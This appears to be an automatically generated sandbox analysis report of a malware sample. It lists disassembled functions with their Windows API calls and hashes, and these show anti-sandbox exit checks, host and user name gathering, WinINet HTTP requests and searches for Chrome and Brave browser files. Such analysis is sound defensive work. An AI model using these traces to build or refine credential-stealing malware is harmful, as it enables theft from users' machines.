                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                    • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                    Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                    • __aulldiv.LIBCMT ref: 00401258
                                    • __aulldiv.LIBCMT ref: 00401266
                                    • ExitProcess.KERNEL32 ref: 00401294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                    Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                    • ExitProcess.KERNEL32 ref: 00416B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                    • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                    • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                    • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                    Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                    • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                    • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                    • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                    Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocComputerNameProcess
                                    • String ID:
                                    • API String ID: 4203777966-0
                                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                    Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                    • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                    • ExitProcess.KERNEL32 ref: 00401143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                    Function 009E9FCE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009E9FF6
                                    • Module32First.KERNEL32(00000000,00000224), ref: 009EA016
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3833638111-0
                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction ID: bc5e972dc53f9bd94111de105fca02d42543bb3ead558db78aae40f726567df2
                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction Fuzzy Hash: B4F09632100751BBD7213BF6988DBAEB6ECAF49725F100529E656D10C0DBB0FC454A61
                                    Function 007E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000400,?,?,007E0223,?,?), ref: 007E0E19
                                    • SetErrorMode.KERNEL32(00000000,?,?,007E0223,?,?), ref: 007E0E1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction ID: 7a55b1bb0ad5a630dcb172cb140b2a30c45defdff20bc49bbe57137cadadddd3
                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction Fuzzy Hash: 4CD0123114512877D7003A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B4994046E5
                                    Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                    Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    • ExitProcess.KERNEL32 ref: 004011C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 1004333139-0
                                    • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                    • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                    • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                    • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                    Function 009E9C8D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009E9CDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction ID: 6e024fccda4761e7647706d31abedc0c3617590f79dd60c0f223e7f5874c58d0
                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction Fuzzy Hash: 59112B79A00208EFDB01DF99C985E98BBF5AF08351F158094F9489B362D371EE90DB80

                                    Non-executed Functions

                                    Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 004138CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-817767981
                                    • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                    • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                    Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                    • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                    • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                    • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                    Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0041492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00414B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                    • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                    • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                    • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                    Function 007F3B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 007F3B33
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F3B4A
                                    • lstrcat.KERNEL32(?,?), ref: 007F3B9C
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 007F3BAE
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 007F3BC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F3ECE
                                    • FindClose.KERNEL32(000000FF), ref: 007F3EE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID:
                                    • API String ID: 1125553467-0
                                    • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                    • Instruction ID: a8624d023464c76b23f09dfd6ce90f5588fde92e1678269d0c982bc804195229
                                    • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                    • Instruction Fuzzy Hash: 2CA14FB5A4021CABDB24DBA4CC89FFE7379BF49300F444588A60D96241DB799B84CF62
                                    Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                    • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                    • wsprintfA.USER32 ref: 004145A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                    • FindClose.KERNEL32(000000FF), ref: 004146A0
                                    • lstrcatA.KERNEL32(?,00A130A0,?,00000104), ref: 004146C5
                                    • lstrcatA.KERNEL32(?,00A19F60), ref: 004146D8
                                    • lstrlenA.KERNEL32(?), ref: 004146E5
                                    • lstrlenA.KERNEL32(?), ref: 004146F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
